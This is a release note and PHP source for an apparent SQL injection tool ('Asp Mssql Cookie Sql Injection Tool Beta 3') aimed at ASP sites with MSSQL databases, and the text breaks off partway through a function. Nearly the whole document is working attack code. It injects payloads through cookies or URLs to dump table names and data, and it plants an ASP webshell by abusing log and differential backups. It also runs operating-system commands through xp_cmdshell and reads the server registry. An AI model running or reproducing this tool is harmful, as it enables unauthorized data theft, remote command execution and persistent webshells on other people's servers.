The beta 3 final release adds quite a few features over the earlier version and changes a lot of code. Commonly needed helper functions were added:
1. Get database server information, including whether certain extended stored procedures are available (not always accurate, though)
2. Get a webshell via log backup
3. Get a webshell via differential backup
4. List directories with xp_dirtree
5. Read the registry with xp_regread
6. Execute commands with xp_cmdshell
7. Execute a custom SQL statement
The code is as follows:
<?php
$auth_ok=0;
$user=$_SERVER['PHP_AUTH_USER'];
$pass=$_SERVER['PHP_AUTH_PW'];
if(isset($user) && isset($pass) && $user=='admin' && $pass=='shmily'){
    $auth_ok=1;
}
if(!$auth_ok) {
    header('WWW-Authenticate: Basic realm="Top Secret Area"');
    header('HTTP/1.0 401 Unauthorized');
    exit;
}
$cookie=$_POST['_cookie'];
$referer=$_POST['_referer'];
$url=$_POST['_url'];
$t_name=$_POST['_tablename'];
$tab_name=$_POST['_tabname'];
$field_name=$_POST['_fieldname'];
$proxy=$_POST['_proxy'];
$useproxy=$_POST['_useproxy'];
$_action=$_POST['_action'];
$_btype=$_POST['_btype'];
$_htype=$_POST['_htype'];
$function=$_POST['_function'];
$abspath=get_magic_quotes_gpc()?stripslashes($_POST['_abs_path']):$_POST['_abs_path'];
$code=get_magic_quotes_gpc()?stripslashes($_POST['_code']):$_POST['_code'];
$tmp_tab=$_POST['_temp_table'];
$regkey=get_magic_quotes_gpc()?stripslashes($_POST['_reg_key']):$_POST['_reg_key'];
$regvalue=get_magic_quotes_gpc()?stripslashes($_POST['_reg_value']):$_POST['_reg_value'];
$dir=get_magic_quotes_gpc()?stripslashes($_POST['_dir']):$_POST['_dir'];
$cmd=get_magic_quotes_gpc()?stripslashes($_POST['_cmd']):$_POST['_cmd'];
$execsql=get_magic_quotes_gpc()?stripslashes($_POST['_sql']):$_POST['_sql'];
?>
<html>
<head>
<title>Asp Mssql Cookie Sql Injection Tool</title>
<style>body{font-family:trebuchet ms;font-size:12px;color:green;background-color:black}hr{width:100%;height:2px;}br{height:0.5px}</style>
</head>
<body>
<center><h1>Asp Mssql Sql Injection Tool Beta 3 by Mika[EST]</h1></center>
<hr><hr>
<div align="left">
<TABLE BORDER="0" CELLPADDING="0" CELLSPACING="0">
<form name="_common" action="<?=$_SERVER['PHP_SELF']?>" method="POST">
<tr>
<td><b>Exploitable Url: </b><input type="text" name="_url" size=60 value="<?=$url?>" /> <?php if(isset($url) && empty($url)) echo "<font color=red> unspecified</font>\n"?></td>
<td> Available Functions: <select name="_function">
<option value="info" onclick="_common._abs_path.disabled=true;_common._code.disabled=true;_common._temp_table.disabled=true;_common._reg_key.disabled=true;_common._reg_value.disabled=true;_common._dir.disabled=true;_common._cmd.disabled=true;_common._sql.disabled=true;" >Mssql server INFO</option>
<option value="logshell" onclick="_common._abs_path.disabled=false;_common._code.disabled=false;_common._temp_table.disabled=false;_common._reg_key.disabled=true;_common._reg_value.disabled=true;_common._dir.disabled=true;_common._cmd.disabled=true;_common._sql.disabled=true;" <?=($function=="logshell")?"selected":""?>>Log backup webshell</option>
<option value="diffshell" onclick="_common._abs_path.disabled=false;_common._code.disabled=false;_common._temp_table.disabled=false;_common._reg_key.disabled=true;_common._reg_value.disabled=true;_common._dir.disabled=true;_common._cmd.disabled=true;_common._sql.disabled=true;" <?=($function=="diffshell")?"selected":""?>>Differential backup webshell</option>
<option value="listdir" onclick="_common._abs_path.disabled=true;_common._code.disabled=true;_common._temp_table.disabled=false;_common._reg_key.disabled=true;_common._reg_value.disabled=true;_common._dir.disabled=false;_common._cmd.disabled=true;_common._sql.disabled=true;" <?=($function=="listdir")?"selected":""?>>List Directory</option>
<option value="readreg" onclick="_common._abs_path.disabled=true;_common._code.disabled=true;_common._temp_table.disabled=false;_common._reg_key.disabled=false;_common._reg_value.disabled=false;_common._dir.disabled=true;_common._cmd.disabled=true;_common._sql.disabled=true;" <?=($function=="readreg")?"selected":""?>>Read Registry</option>
<option value="execcmd" onclick="_common._abs_path.disabled=true;_common._code.disabled=true;_common._temp_table.disabled=false;_common._reg_key.disabled=true;_common._reg_value.disabled=true;_common._dir.disabled=true;_common._cmd.disabled=false;_common._sql.disabled=true;" <?=($function=="execcmd")?"selected":""?>>Execute Command Via Xp_cmdshell</option>
<option value="execsql" onclick="_common._abs_path.disabled=true;_common._code.disabled=true;_common._temp_table.disabled=true;_common._reg_key.disabled=true;_common._reg_value.disabled=true;_common._dir.disabled=true;_common._cmd.disabled=true;_common._sql.disabled=false;" <?=($function=="execsql")?"selected":""?>>Execute Sql Query</option>
</select>
<input type="submit" name="_submit" value="Execute Function"></input></td>
</tr>
<tr>
<td><b>Exploitable Cookie: </b><input type="text" name="_cookie" size=60 value="<?=$cookie?>" <?php if ($_htype=="url") echo "disabled";?> /> <?php if(isset($cookie) && empty($cookie)) echo "<font color=red> unspecified</font>\n"?></td>
<td> Webshell Absolute Path: <input type="text" name="_abs_path" size=30 value="<?=$abspath?>" <?=($function=="logshell" || $function=="diffshell")?"":"disabled"?>></input></td>
</tr>
<tr>
<td><b>Referer Url: </b><input type="text" name="_referer" size=60 value="<?=$referer?>" <?php if ($_htype=="url") echo "disabled";?>/> <?php if(isset($referer) && empty($referer)) echo "<font color=red> unspecified</font>\n"?></td>
<td> Webshell code: <input type="text" name="_code" size=30 value='<?=empty($code)?"<%execute(request(\"l\"))%>":$code?>' <?=($function=="logshell" || $function=="diffshell")?"":"disabled"?>></input></td>
</tr>
<tr>
<td><input type="radio" name="_btype" value="num" <?php if (empty($_btype) || $_btype=="num") echo "checked";?>>Num Type</input> <input type="radio" name="_btype" value="char" <?php if ($_btype=="char") echo "checked";?>>Char Type</input> <input type="radio" name="_htype" value="url" <?php if ($_htype=="url") echo "checked";?> onclick="_url.disabled=false;_cookie.disabled=true;_referer.disabled=true;">Url</input> <input type="radio" name="_htype" value="cookie" <?php if ($_htype=="cookie" || empty($_htype)) echo "checked";?> onclick="_url.disabled=false;_cookie.disabled=false;_referer.disabled=false;">Cookie</input></td>
<td> Temporary Table: <input type="text" name="_temp_table" size=15 value="<?=empty($tmp_tab)?"tmp_mika":$tmp_tab?>" <?=($function=="logshell" || $function=="diffshell" || $function=="listdir" || $function=="execcmd" || $function=="readreg")?"":"disabled"?>></input></td>
</tr>
<tr>
<td><input type="radio" name="_action" value="exp_tabs" <?php if(empty($_action) || $_action=="exp_tabs") echo "checked" ?> onclick="_tablename.disabled=true;_fieldname.disabled=true;_tabname.disabled=true;">Explode Tables Of Current DataBase</input></td>
<td> Registry Key: <input type="text" name="_reg_key" size=40 value="<?=empty($regkey)?"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\W3SVC\\Parameters\\Virtual Roots":$regkey?>" <?=($function=="readreg")?"":"disabled"?>></input></td>
</tr>
<tr>
<td><input type="radio" name="_action" value="exp_fields" onclick="_tablename.disabled=false;_fieldname.disabled=true;_tabname.disabled=true;" <?php if($_action=="exp_fields") echo "checked"?>>Explode Fields Of </input> <input type="text" name="_tablename" size=30 value="<?php if(!empty($tab_name)) echo $tab_name; else echo $t_name;?>" <?php if($_action != "exp_fields") echo "disabled";?> /></td>
<td> Registry Value: <input type="text" name="_reg_value" size=20 value="<?=empty($regvalue)?"/":$regvalue?>" <?=($function=="readreg")?"":"disabled"?>></input></td>
</tr>
<tr>
<td><input type="radio" name="_action" value="exp_values" onclick="_tablename.disabled=true;_fieldname.disabled=false;_tabname.disabled=false;" <?php if($_action=="exp_values") echo "checked"?>>Explode Values Of </input> <input type="text" name="_fieldname" size=30 value="<?=$field_name?>" <?php if($_action != "exp_values") echo "disabled";?>/> IN <input type="text" name='_tabname' size=20 value="<?php if(!empty($t_name)) echo $t_name; else echo $tab_name;?>" <?php if($_action != "exp_values") echo "disabled";?> /></td>
<td> Directory Path: <input type="text" name="_dir" size=20 value="<?=empty($dir)?"c:\\":$dir?>" <?=($function=="listdir")?"":"disabled"?>></input></td>
</tr>
<tr>
<td><input type="checkbox" name="_useproxy" value="use_proxy" onclick="if(this.checked==true){_proxy.disabled=false;}else{_proxy.disabled=true;}" <?php if(isset($useproxy) && !empty($proxy)) echo "checked";?>>Via Anonymous Proxy <input type="text" name="_proxy" size=30 value="<?=$proxy?>" <?php if(empty($proxy)) echo "disabled=true";?> ></input></td>
<td> cmd Command: <input type="text" name="_cmd" size=30 value="<?=empty($cmd)?"dir c:\\":$cmd?>" <?=($function=="execcmd")?"":"disabled"?>></input></td>
</tr>
<tr>
<td><input type="submit" name="_submit" value="Launch Attack"></input> <?php echo str_repeat('&nbsp;',50);?> <input type="reset" name="_reset" value="Reset Attack"></input> </td>
<td> Sql Query: <input type="text" name="_sql" size=45 value="<?=$execsql?>" <?=($function=="execsql")?"":"disabled"?>></input></td>
</tr>
</form>
</table>
</div>
<hr><hr>
<?php
///////////////////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////////////////
global $curl,$referer,$cookie,$url,$table_name,$field_name,$t_name,$tab_name;
// Pre-URL-encoded probe templates; the MFM_* tokens are substituted before use.
$tab_exp="%20and%201=(select%20top%201%20nchar(124)%2bname%2bnchar(124)%20from%20sysobjects%20where%20xtype=nchar(85)%20and%20name%20not%20in(MFM_TABLES))--";
$field_exp="%20and%20(select%20top%201%20nchar(124)%2Bcol_name(object_id(TABLE_NAME),MFM_NUM)%2Bnchar(124)%20from%20sysobjects)%3E0--";
$value_exp="%20and%20(select%20top%201%20nchar(124)%2Bcast(MFM_FIELD_NAME%20as%20varchar(8000))%2Bnchar(124)%20from%20MFM_TABLE_NAME%20where%20MFM_FIELD_NAME%20not%20in(MFM_VALUE))%3E0--";
$count_exp="%20and%20(select%20nchar(124)%2Bcast(%20count(*)%20as%20varchar(255))%2bnchar(124)%20from%20MFM_TABLE_NAME)%3E0--";
$count_table="%20and%201=(select%20top%201%20nchar(124)%2bcast(count(*)%20as%20varchar(8000))%2bnchar(124)%20from%20sysobjects%20where%20xtype=nchar(85))--";
$count_column="%20and%201=(select%20nchar(124)%2Bcast(count(*)%20as%20varchar(8000))%2Bnchar(124)%20from%20syscolumns%20where%20id=object_id(MFM_TABLE_NAME))--";
///////////////////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////////////////
if($_htype=='url'){
    // in URL mode the "cookie" slot simply carries the URL that holds the MIKA marker
    $cookie=$url;
    $referer=$url;
}
if(array_key_exists("_submit",$_POST) && !empty($url) && !empty($cookie) && !empty($referer)){
    $bstr=$_POST['_btype'];
    $action=$_POST['_action'];
    $submit=$_POST['_submit'];
    echo "<div align=left><b>:::Attack Parameters:::</b><br>\n";
    echo "<b>Target Url:</b><font color=blue>$url</font><br>\n";
    if($_htype=='cookie'){
        echo "<b>Target Cookie:</b><font color=blue>\"$cookie\"</font><br>\n";
        echo "<b>Referer Url:</b><font color=blue>$referer</font><br>\n";
    }
    echo "<b>Exploit Type:</b><font color=blue>$_htype</font><br>\n";
    echo "<b>Injection Type:</b>";
    switch($bstr){
        case 'num':
            echo "<font color=blue>number</font><br>\n";
            $bstr=0; // numeric injection point
            break;
        case 'char':
            echo "<font color=blue>character</font><br>\n";
            $bstr=1; // string injection point: a closing quote (%27) is prepended to every payload
            break;
    }
    echo "<b>Via Proxy:</b>".((isset($useproxy) && !empty($proxy))? '<font color=blue>Yes</font>':'<font color=blue>No</font>')."<br>\n";
    if(isset($useproxy) && !empty($proxy)) echo "<b>Proxy Address:</b><font color=blue>$proxy</font><br>\n";
    echo "<b>Injection Action:</b>";
    if($submit=="Launch Attack"){
        switch($action){
            case 'exp_tabs':
                echo "<font color=blue>Explode Table Names</font><br>\n</div>\n";
                exploit_tab();
                break;
            case 'exp_fields':
                echo "<font color=blue>Explode Table Fields</font><br>\n";
                if(empty($t_name)) die("<font color=red>Error:table name must be specified!</font><br>\n</div>\n");
                $table_name=$t_name;
                echo "<b>Table Name:</b><font color=blue>$table_name</font><br>\n</div>\n";
                exploit_field();
                break;
            case 'exp_values':
                echo "<font color=blue>Explode Table Values</font><br>\n";
                if(empty($tab_name)) die("<font color=red>Error:table name must be specified!</font><br>\n</div>\n");
                elseif(empty($field_name)) die("<font color=red>Error:field name must be specified!</font><br>\n</div>\n");
                $table_name=$tab_name;
                echo "<b>Table Name:</b><font color=blue>$table_name</font><br>\n";
                echo "<b>Fields Name:</b><font color=blue>".str_replace(","," ",$field_name)."</font><br>\n</div>\n";
                explode_value();
                break;
        }
    }
    else{
        switch($function){
            case 'info':
                echo "<font color=blue>Get Server Information</font><br>\n</div>\n";
                getinfo();
                break;
            case 'logshell':
            case 'diffshell':
                if($function=='logshell') echo "<font color=blue>Backup Log Webshell</font><br>\n";
                else echo "<font color=blue>Backup Differential Webshell</font><br>\n";
                if(empty($abspath)) die("<font color=red>Error:abspath must be specified!</font><br>\n</div>\n");
                if(empty($code)) die("<font color=red>Error:code must be specified!</font><br>\n</div>\n");
                if(empty($tmp_tab)) die("<font color=red>Error:temporary table must be specified!</font><br>\n</div>\n");
                echo "<b>Path:</b><font color=blue>$abspath</font><br>\n";
                echo "<b>code:</b><font color=blue>$code</font><br>\n";
                echo "<b>temp table:</b><font color=blue>$tmp_tab</font><br>\n</div>\n";
                if($function=='logshell') logwebshell();
                else diffwebshell();
                break;
            case 'listdir':
                echo "<font color=blue>List Directory</font><br>\n";
                if(empty($tmp_tab)) die("<font color=red>Error:temporary table must be specified!</font><br>\n</div>\n");
                if(empty($dir)) die("<font color=red>Error:Directory must be specified!</font><br>\n</div>\n");
                echo "<b>temp table:</b><font color=blue>$tmp_tab</font><br>\n";
                echo "<b>Directory:</b><font color=blue>$dir</font><br>\n</div>\n";
                listdir();
                break;
            case 'readreg':
                if(empty($regkey)) die("<font color=red>Error:registry key must be specified!</font><br>\n</div>\n");
                if(empty($regvalue)) die("<font color=red>Error:registry value must be specified!</font><br>\n</div>\n");
                if(empty($tmp_tab)) die("<font color=red>Error:temporary table must be specified!</font><br>\n</div>\n");
                echo "<b>temp table:</b><font color=blue>$tmp_tab</font><br>\n";
                echo "<b>registry key:</b><font color=blue>$regkey</font><br>\n";
                echo "<b>registry value:</b><font color=blue>$regvalue</font><br>\n</div>\n";
                readreg();
                break;
            case 'execcmd':
                if(empty($tmp_tab)) die("<font color=red>Error:temporary table must be specified!</font><br>\n</div>\n");
                if(empty($cmd)) die("<font color=red>Error:cmd must be specified!</font><br>\n</div>\n");
                echo "<b>temp table:</b><font color=blue>$tmp_tab</font><br>\n";
                echo "<b>cmd command:</b><font color=blue>$cmd</font><br>\n</div>\n";
                execcmd();
                break;
            case 'execsql':
                if(empty($execsql)) die("<font color=red>Error:sql must be specified!</font><br>\n</div>\n");
                echo "<b>sql query string:</b><font color=blue>$execsql</font><br>\n</div>\n";
                execsql();
                break;
        }
    }
}
///////////////////////////////////////////////////////////////////////////////////////
function dbgput($info) {
    echo "<div align=center><textarea title=\"Debug Info\" cols=\"50\" rows=\"10\" wrap=\"hard\">$info</textarea></div><br>";
}
///////////////////////////////////////////////////////////////////////////////////////
function getinfo(){
    global $bstr,$cookie;
    // One probe: version, login, user, database and role checks concatenated with char(92) ('\')
    // separators and fenced by char(124) ('|'); the numeric comparison forces an ODBC conversion
    // error that echoes the whole string back. The 0x... literals are UTF-16LE role names.
    $s1=" and (select char(124)+@@VERSION+char(92)+system_user+char(92)+user+char(92)+db_name()+char(92)+convert(char(1),IS_MEMBER(0x640062005F006F0077006E0065007200))+char(92)+convert(char(1),IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00))+char(92)+convert(char(1),IS_SRVROLEMEMBER(0x730065007200760065007200610064006D0069006E00))+char(92)+convert(char(1),IS_SRVROLEMEMBER(0x620075006C006B00610064006D0069006E00))+char(92)+convert(char(1),IS_SRVROLEMEMBER(0x73006500740075007000610064006D0069006E00))+char(92)+convert(char(1),IS_SRVROLEMEMBER(0x6400690073006B00610064006D0069006E00))+char(124))>0--";
    // Per extended procedure: count its row in master..sysobjects (xtype 'X', passed as 0x5800)
    $s2=" and (select char(124)+cast(count(*) as varchar(400))+char(124) from master..sysobjects where xtype=0x5800 and name=XP_XP_XP)>0--";
    $xps=array('xp_cmdshell','xp_regread','xp_dirtree','xp_subdirs','xp_IsNtAdmin','sp_oamethod','sp_oacreate');
    $infohead=array('Server Version','LoginName','Username','Database','IsDb_Owner','IsSysadmin','IsServerAdmin','IsBulkAdmin','IsSetupAdmin','IsDiskAdmin');
    if($bstr) $new_cookie=str_replace("MIKA",'%27'.urlencode($s1),$cookie);
    else $new_cookie=str_replace("MIKA",urlencode($s1),$cookie);
    init_session();
    $re=find_value($new_cookie);
    if($re==null) die("<b>Failure</b>");
    $info=explode(chr(92),$re);
    $i=0;
    echo "<br><div align=center><h2>:::Mssql Server Information:::</h2><br><hr><br>\n";
    echo "<table border=\"1\">\n";
    foreach($infohead as $head){
        echo "<tr><th><b>$head:</b></th><td><font color=blue>$info[$i]</font></td></tr>\n";
        $i++;
    }
    foreach($xps as $xp){
        $new_s2=str_replace("XP_XP_XP",str2sqlhex($xp),$s2);
        //dbgput($new_s2);
        if($bstr) $new_cookie=str_replace("MIKA",'%27'.urlencode($new_s2),$cookie);
        else $new_cookie=str_replace("MIKA",urlencode($new_s2),$cookie);
        $re=find_value($new_cookie);
        if($re==null) die("<b>Failure</b>");
        echo "<tr><th><b>$xp:</b></th><td><font color=blue>$re</font></td></tr>\n";
    }
    echo "</table></div><br>\n";
}
///////////////////////////////////////////////////////////////////////////////////////
function logwebshell(){
    global $bstr,$cookie,$curl,$_htype,$abspath,$code,$tmp_tab;
    // ALTER DATABASE takes a literal database name, not db_name(), so the recovery-model
    // switch is built as dynamic SQL and run with EXEC. The first backup (to c:\mika.bak,
    // given as a UTF-16LE hex literal) primes the log so the second one stays small.
    $logstrs=array(
        ";declare @d sysname select @d=db_name() exec('alter database ['+@d+'] set recovery full')--",
        ";drop table [$tmp_tab];create table [$tmp_tab]([cmd] [image])--",
        ";declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x63003A005C006D0069006B0061002E00620061006B00 backup log @a to disk = @s with init--",
        ";insert into [$tmp_tab](cmd) values(".str2hex($code).")--",
        ";declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=".str2sqlhex($abspath)." backup log @a to disk=@s with init--",
        ";declare @d sysname select @d=db_name() exec('alter database ['+@d+'] set recovery simple')--"
    );
    init_session();
    curl_setopt($curl,CURLOPT_NOBODY,1);
    echo "<center><h2><font color=blue>Execution Track Data</font></h2></center><br><hr>\n";
    echo "<div align=center><table border=\"2\">\n";
    foreach($logstrs as $logstr){
        if($bstr) $new_cookie=str_replace("MIKA",'%27'.urlencode($logstr),$cookie);
        else $new_cookie=str_replace("MIKA",urlencode($logstr),$cookie);
        flush();
        if($_htype=='url') curl_setopt($curl,CURLOPT_URL,$new_cookie);
        else curl_setopt($curl,CURLOPT_COOKIE,$new_cookie);
        $retnstr=curl_exec($curl);
        // with CURLOPT_HEADER set, offset 9 of the response is the HTTP status code
        if(substr($retnstr,9,3)!='200') echo "<tr><td><font color=red>$logstr</font></td></tr>\n";
        else echo "<tr><td><font color=blue>$logstr</font></td></tr>\n";
        sleep(5);
    }
    curl_close($curl);
    echo "</table></div>";
    //dbgput($retnstr);
}
///////////////////////////////////////////////////////////////////////////////////////
function diffwebshell(){
    global $bstr,$cookie,$curl,$_htype,$abspath,$code,$tmp_tab;
    // Full backup first (0x6D00... is "mika.bak" in UTF-16LE), then a differential backup
    // to the web path carries the freshly inserted page into the file.
    $diffstrs=array(
        ";declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x6D0069006B0061002E00620061006B00 backup database @a to disk=@s--",
        ";drop table [$tmp_tab];create table [$tmp_tab] ([cmd] [image])--",
        ";insert into [$tmp_tab](cmd) values(".str2hex($code).")--",
        ";declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=".str2sqlhex($abspath)." backup database @a to disk=@s WITH DIFFERENTIAL--"
    );
    init_session();
    curl_setopt($curl,CURLOPT_NOBODY,1);
    echo "<center><h2><font color=blue>Execution Track Data</font></h2></center><br><hr>\n";
    echo "<div align=center><table border=\"2\">\n";
    foreach($diffstrs as $diffstr){
        if($bstr) $new_cookie=str_replace("MIKA",'%27'.urlencode($diffstr),$cookie);
        else $new_cookie=str_replace("MIKA",urlencode($diffstr),$cookie);
        flush();
        if($_htype=='url') curl_setopt($curl,CURLOPT_URL,$new_cookie);
        else curl_setopt($curl,CURLOPT_COOKIE,$new_cookie);
        $retnstr=curl_exec($curl);
        if(substr($retnstr,9,3)!='200') echo "<tr><td><font color=red>$diffstr</font></td></tr>\n";
        else echo "<tr><td><font color=blue>$diffstr</font></td></tr>\n";
        sleep(5);
    }
    curl_close($curl);
    echo "</table></div>";
}
///////////////////////////////////////////////////////////////////////////////////////
function listdir(){
    global $curl,$cookie,$bstr,$tmp_tab,$dir,$table_name,$field_name,$_htype;
    // xp_dirtree output has the shape (subdir, depth, file); it is captured in a scratch table
    $dirstrs=array(
        ";drop table [$tmp_tab];create table [$tmp_tab]([subdir] nvarchar(400) NULL,[depth] tinyint NULL,[file] bit NULL)--",
        ";DELETE [$tmp_tab];Insert [$tmp_tab] exec master..xp_dirtree 'MIKA_PATH',1,1--"
    );
    if($bstr) $new_cookie=str_replace("MIKA",'%27'.urlencode($dirstrs[0]),$cookie);
    else $new_cookie=str_replace("MIKA",urlencode($dirstrs[0]),$cookie);
    init_session();
    curl_setopt($curl,CURLOPT_NOBODY,1);
    if($_htype=='url') curl_setopt($curl,CURLOPT_URL,$new_cookie);
    else curl_setopt($curl,CURLOPT_COOKIE,$new_cookie);
    $rtnstr=curl_exec($curl);
    if(substr($rtnstr,9,3)!='200'){
        //echo "<b><font color=red>may be something wrong!</font></b>\n";
    }
    sleep(3);
    $dirstr=str_replace("MIKA_PATH",$dir,$dirstrs[1]);
    if($bstr) $new_cookie=str_replace("MIKA",'%27'.urlencode($dirstr),$cookie);
    else $new_cookie=str_replace("MIKA",urlencode($dirstr),$cookie);
    if($_htype=='url') curl_setopt($curl,CURLOPT_URL,$new_cookie);
    else curl_setopt($curl,CURLOPT_COOKIE,$new_cookie);
    $rtnstr=curl_exec($curl);
    if(substr($rtnstr,9,3)!='200'){
        //echo "<b><font color=red>may be something wrong!</font></b>\n";
    }
    sleep(3);
    curl_close($curl);
    $table_name=$tmp_tab;
    $field_name="subdir,depth,file";
    explode_value();
}
///////////////////////////////////////////////////////////////////////////////////////
function readreg(){
    global $cookie,$curl,$tmp_tab,$_htype,$regkey,$regvalue,$bstr,$table_name,$field_name;
    $regstrs=array(
        ";DROP TABLE [$tmp_tab];CREATE TABLE [$tmp_tab]([Value] nvarchar(4000) NULL,[Data] nvarchar(4000) NULL)--",
        ";DELETE [$tmp_tab];Insert [$tmp_tab] exec master.dbo.xp_regread 'MIKA_ROOT','MIKA_SUB','MIKA_VALUE'--"
    );
    // xp_regread wants the root key and the sub key as separate arguments
    $keys=explode("\\",$regkey);
    $rootkey=$keys[0];
    array_shift($keys);
    $subkey=implode("\\",$keys);
    if($bstr) $new_cookie=str_replace("MIKA",'%27'.urlencode($regstrs[0]),$cookie);
    else $new_cookie=str_replace("MIKA",urlencode($regstrs[0]),$cookie);
    init_session();
    curl_setopt($curl,CURLOPT_NOBODY,1);
    if($_htype=='url') curl_setopt($curl,CURLOPT_URL,$new_cookie);
    else curl_setopt($curl,CURLOPT_COOKIE,$new_cookie);
    $rtnstr=curl_exec($curl);
    if(substr($rtnstr,9,3)!='200'){
        //echo "<b><font color=red>may be something wrong!</font></b>\n";
    }
    sleep(3);
    $regstr=str_replace("MIKA_ROOT",$rootkey,$regstrs[1]);
    $regstr=str_replace("MIKA_SUB",$subkey,$regstr);
    $regstr=str_replace("MIKA_VALUE",$regvalue,$regstr);
    if($bstr) $new_cookie=str_replace("MIKA",'%27'.urlencode($regstr),$cookie);
    else $new_cookie=str_replace("MIKA",urlencode($regstr),$cookie);
    if($_htype=='url') curl_setopt($curl,CURLOPT_URL,$new_cookie);
    else curl_setopt($curl,CURLOPT_COOKIE,$new_cookie);
    $rtnstr=curl_exec($curl);
    if(substr($rtnstr,9,3)!='200'){
        //echo "<b><font color=red>may be something wrong!</font></b>\n";
    }
    curl_close($curl);
    sleep(3);
    $table_name=$tmp_tab;
    $field_name="Value,Data";
    explode_value();
}
///////////////////////////////////////////////////////////////////////////////////////
function execcmd(){
    global $cookie,$bstr,$_btype,$_htype,$curl,$cmd,$tmp_tab,$table_name,$field_name;
    // the command is passed as a UTF-16LE hex literal, so no quotes appear in the payload
    $cmdstrs=array(
        ";drop table [$tmp_tab];create table [$tmp_tab]([id] int NOT NULL IDENTITY (1,1), [ResultTxt] nvarchar(4000) NULL)--",
        ";declare @a sysname select @a=".str2sqlhex($cmd)." insert into [$tmp_tab](ResultTxt) exec master.dbo.xp_cmdshell @a--"
    );
    init_session();
    curl_setopt($curl,CURLOPT_NOBODY,1);
    echo "<center><h2><font color=blue>Execution Track Data</font></h2></center><br>\n";
    echo "<div align=center><table border=\"2\">\n";
    foreach($cmdstrs as $cmdstr){
        if($bstr) $new_cookie=str_replace("MIKA",'%27'.urlencode($cmdstr),$cookie);
        else $new_cookie=str_replace("MIKA",urlencode($cmdstr),$cookie);
        flush();
        if($_htype=='url') curl_setopt($curl,CURLOPT_URL,$new_cookie);
        else curl_setopt($curl,CURLOPT_COOKIE,$new_cookie);
        $retnstr=curl_exec($curl);
        if(substr($retnstr,9,3)!='200') echo "<tr><td><font color=red>$cmdstr</font></td></tr>\n";
        else echo "<tr><td><font color=blue>$cmdstr</font></td></tr>\n";
        sleep(5);
    }
    curl_close($curl);
    echo "</table></div>";
    $table_name=$tmp_tab;
    $field_name="ResultTxt";
    explode_value();
}
///////////////////////////////////////////////////////////////////////////////////////
function execsql(){
    global $bstr,$cookie,$curl,$execsql,$_htype;
    if($bstr) $new_cookie=str_replace("MIKA",'%27'.urlencode($execsql),$cookie);
    else $new_cookie=str_replace("MIKA",urlencode($execsql),$cookie);
    init_session();
    if($_htype=="cookie") curl_setopt($curl,CURLOPT_COOKIE,$new_cookie);
    else curl_setopt($curl,CURLOPT_URL,$new_cookie);
    $retnstr=curl_exec($curl);
    curl_close($curl);
    echo "<center><h2>:::Execution Results:::</h2></center><br>\n";
    dbgput($retnstr);
}
///////////////////////////////////////////////////////////////////////////////////////
function output_start() {
    echo "<hr><br>\n";
    echo "<div align=center>\n";
    echo "<table border=\"1\">\n";
    flush();
}
function output_th($th) {
    switch($th){
        case 'tr': echo "<tr>"; break;
        case '/tr': echo "</tr>\n"; break;
        default: echo "<th><font color=blue>$th</font></th>\n"; break;
    }
    flush();
}
function output_td($td) {
    switch($td){
        case 'tr': echo "<tr>"; break;
        case '/tr': echo "</tr>\n"; break;
        default: echo "<td><font color=blue>$td</font></td>\n"; break;
    }
    flush();
}
function output_end() {
    echo "</table></div><br>\n";
    flush();
}
///////////////////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////////////////
// dump field values (current method: TOP N ... ORDER BY asc, then take the last row with ORDER BY desc)
function explode_value() {
    global $bstr,$table_name,$field_name,$cookie,$count_exp,$curl;
    $i=1;
    $count=0;
    $tmp_str="";
    $sub_strs=array();
    $fields=explode(",",$field_name);
    $sql_str=" And (Select Top 1 char(124)";
    // one isNull(...) per requested field; fields of a row are joined with char(13) so the
    // result can be split back into columns
    $sub_str='+isNull(cast([MIKA_FIELD] as nvarchar(4000)),char(32))';
    foreach($fields as $field){
        $new_sub_str=str_replace('MIKA_FIELD',$field,$sub_str);
        $sql_str.=$new_sub_str."+char(13)";
        $tmp_str.="[$field],";
    }
    $sql_str=substr($sql_str,0,strlen($sql_str)-9); // drop the trailing "+char(13)"
    $tmp_str=substr($tmp_str,0,strlen($tmp_str)-1); // drop the trailing ","
    $sql_str.="+char(124) from (Select Top MIKA_NUM $tmp_str From [MIKA_TABLE] Where 1=1 Order by $tmp_str) T Order by ";
    $sub_str="[MIKA_FIELD] desc";
    foreach($fields as $field){
        $sub_strs[]=str_replace('MIKA_FIELD',$field,$sub_str);
    }
    $sql_str.=implode(",",$sub_strs).")>0--";
    $sql_str=str_replace('MIKA_TABLE',$table_name,$sql_str);
    $old=str_replace('MFM_TABLE_NAME',$table_name,$count_exp);
    init_session();
    if($bstr) $new_cookie=str_replace('MIKA','%27'.$old,$cookie);
    else $new_cookie=str_replace('MIKA',$old,$cookie);
    output_start();
    $re=find_value($new_cookie);
    if($re) {
        $count=$re;
        echo "<b>the number of record in $table_name:</b> <font color=blue>$count</font>\n";
    }
    output_th('tr');
    foreach ($fields as $field){
        output_th($field);
    }
    output_th('/tr');
    do{
        $new_sql_str=str_replace('MIKA_NUM',$i,$sql_str);
        if($bstr) $new_cookie=str_replace('MIKA','%27'.urlencode($new_sql_str),$cookie);
        else $new_cookie=str_replace('MIKA',urlencode($new_sql_str),$cookie);
        $re=find_value($new_cookie);
        output_td('tr');
        if($re!=null) {
            $res=explode(chr(13),$re);
            foreach($res as $ree){
                output_td($ree);
            }
        }
        output_td('/tr');
        $i++;
    }while($i<=$count);
    output_end();
}
///////////////////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////////////////
// dump table names (alternative method: TOP N user tables ordered by id, then the last one)
function explode_tab(){
    global $bstr,$curl,$cookie;
    $num=1;
    $i=0;
    $old_re="";
    $re="";
    $words=" And (Select Top 1 nchar(124)+cast(name as varchar(8000))+nchar(124) from(Select Top MIKA_NUM id,name from sysobjects Where xtype=char(85) order by id) T order by id desc)>0--";
    init_session();
    output_th('tr');
    for($i=0;$i<8;$i++) output_th('Tables');
    output_th('/tr');
    output_td('tr');
    do{
        $new_words=str_replace('MIKA_NUM',$num,$words);
